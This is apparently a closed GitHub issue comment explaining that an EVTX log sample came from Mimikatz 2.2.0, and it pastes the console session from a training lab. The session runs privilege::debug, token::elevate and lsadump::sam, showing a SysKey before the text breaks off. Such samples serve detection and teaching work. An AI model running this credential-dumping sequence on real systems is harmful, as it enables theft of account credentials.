Closed joswr1ght closed 5 years ago
The EVTX is from Mimikatz 2.2.0, standard hashdump route:
C:\Tools\mimikatz>mimikatz.exe .#####. mimikatz 2.2.0 (x64) #17763 Apr 28 2019 22:07:59 .## ^ ##. "A La Vie, A L'Amour" - (oe.eo) ## / \ ## /*** Benjamin DELPY `gentilkiwi` ( benjamin@gentilkiwi.com ) ## \ / ## > http://blog.gentilkiwi.com/mimikatz '## v ##' Vincent LE TOUX ( vincent.letoux@gmail.com ) '#####' > http://pingcastle.com / http://mysmartlogon.com ***/ mimikatz # privilege::debug Privilege '20' OK mimikatz # token::elevate Token Id : 0 User name : SID name : NT AUTHORITY\SYSTEM 536 {0;000003e7} 1 D 36609 NT AUTHORITY\SYSTEM S-1-5-18 (04g,21p) Primary -> Impersonated ! * Process Token : {0;0001e3dd} 1 F 5190434 SEC504STUDENT\Sec504 S-1-5-21-2977773840-2930198165-1551093962-1000 (15g,24p) Primary * Thread Token : {0;000003e7} 1 D 5221712 NT AUTHORITY\SYSTEM S-1-5-18 (04g,21p) Impersonation (Delegation) mimikatz # lsadump::sam Domain : SEC504STUDENT SysKey : e2a5379f049ff5f37e322618f569e020 Local SID : S-1-5-21-2977773840-2930198165-1551093962
The EVTX is from Mimikatz 2.2.0, standard hashdump route: